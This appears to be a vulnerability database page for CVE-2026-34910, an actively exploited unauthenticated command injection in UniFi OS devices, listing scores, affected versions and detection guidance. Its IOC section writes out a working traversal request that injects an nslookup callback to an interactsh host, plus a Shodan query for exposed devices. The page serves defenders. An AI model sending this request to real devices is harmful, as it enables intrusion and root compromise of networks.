cbcvebase.
CVE-2026-34910
published 2026-05-22

CVE-2026-34910: A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.

PriorityP1100critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2026-06-26
Exploited in the wild
EPSS
78.55%
99.5th percentile
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.

Affected

62 ranges· showing 25
VendorProductVersion rangeFixed in
ubiquiti_incefg< 5.1.125.1.12
ubiquiti_incenvr< 5.1.125.1.12
ubiquiti_incenvr-core< 5.1.125.1.12
ubiquiti_incexpress_7< 5.1.125.1.12
ubiquiti_incucg-fiber< 5.1.125.1.12
ubiquiti_incucg-industrial< 5.1.125.1.12
ubiquiti_incucg-max< 5.1.125.1.12
ubiquiti_incucg-ultra< 5.1.125.1.12
ubiquiti_incuck< 5.1.125.1.12
ubiquiti_incuck-enterprise< 5.1.125.1.12
ubiquiti_incuckp< 5.1.125.1.12
ubiquiti_incudm< 5.1.125.1.12
ubiquiti_incudm-beast< 5.1.115.1.11
ubiquiti_incudm-pro< 5.1.125.1.12
ubiquiti_incudm-pro-max< 5.1.125.1.12
ubiquiti_incudm-se< 5.1.125.1.12
ubiquiti_incudr< 5.1.125.1.12
ubiquiti_incudr-5g< 5.1.125.1.12
ubiquiti_incudr7< 5.1.125.1.12
ubiquiti_incudw< 5.1.125.1.12
ubiquiti_incunas-2< 5.1.105.1.10
ubiquiti_incunas-4< 5.1.105.1.10
ubiquiti_incunas-pro< 5.1.105.1.10
ubiquiti_incunas-pro-4< 5.1.105.1.10
ubiquiti_incunas-pro-8< 5.1.105.1.10

Detection & IOCsextracted from sources · hover to see the quote

urlGET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+{{interactsh-url}}+%3b HTTP/1.1
othershodan-query: html:"UniFi OS"
yara
matchers: dsl: contains_any(body, "CODE_SYSTEM_ERROR", "System failure") AND contains(interactsh_protocol, "dns") AND status_code == 200
  • Look for path traversal sequences in requests targeting /api/auth/validate-sso/ — the authentication component evaluates the raw request URI while Nginx routes based on a normalized URI, enabling auth bypass to reach protected internal routes.
  • Monitor requests to the package-update endpoint 'ucs/update/latest_package' for unsanitized user input in the pkg_name parameter, which is passed directly into a shell command.
  • Because the attack requires no authentication, there will be no failed-login trail. Focus detection on process and network telemetry rather than auth logs.
  • CVE-2026-34910 is chained with CVE-2026-34908 (auth bypass) and CVE-2026-34909 (path traversal) in a single-request RCE exploit delivering a root reverse shell; detections should consider the full chain.
  • ·The detection script does NOT detect active attacks, past exploitation, or the presence of persistence mechanisms/backdoors — only current vulnerability status.
  • ·Organizations applying the patch should first confirm the system has not already been compromised before trusting the patched state.

CVSS provenance

nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.